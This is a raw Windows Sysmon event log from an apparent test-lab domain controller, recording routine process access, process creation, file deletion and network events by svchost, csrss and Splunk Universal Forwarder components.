13:56:17.571{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200976Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.571{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200975Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.571{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E701-6040-F04D-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200974Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.571{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E701-6040-F04D-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200973Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:17.572{5ABCFE62-E701-6040-F04D-00000000AD01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201001Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.977{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D3FB2E41192CFE1F4CEF902A2CE4ECE,SHA256=9DE4388AEB91FA41DC4A242C3690B1D40420F4E5992BF56443124C35D0D677B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201000Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E702-6040-F24D-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200999Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200998Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200997Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200996Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200995Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E702-6040-F24D-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200994Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.915{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E702-6040-F24D-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200993Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.916{5ABCFE62-E702-6040-F24D-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002200992Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:14.955{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55177-false10.0.1.12-8000- 10341000x80000000000000002200991Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.368{5ABCFE62-E702-6040-F14D-00000000AD01}64604416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200990Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E702-6040-F14D-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200989Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200988Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200987Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200986Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200985Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E702-6040-F14D-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200984Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.243{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E702-6040-F14D-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200983Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.244{5ABCFE62-E702-6040-F14D-00000000AD01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200982Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:18.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DED0910BECBC8D21EFA872DF723E45FA,SHA256=0BD31790F0B30A0F96AD9EE7EF2B686C88B6255290DD903D5737E6EE4A75FBAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201013Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.993{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB05317E28E29F9374AC597AB1659623,SHA256=3C4BFBB40AB0E3EE9CDB04BC27DC7952C550AA42A63770C72F65C2459DEED6D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201012Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.540{5ABCFE62-E703-6040-F34D-00000000AD01}49606332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201011Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C19082814F0B98CEAB2C3B321389FD44,SHA256=3D830F402D09C584FC3EAD9596F0208FFD42F3F58FFE3DB125AB0C7EAB27EFE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201010Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E703-6040-F34D-00000000AD01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201009Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201008Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 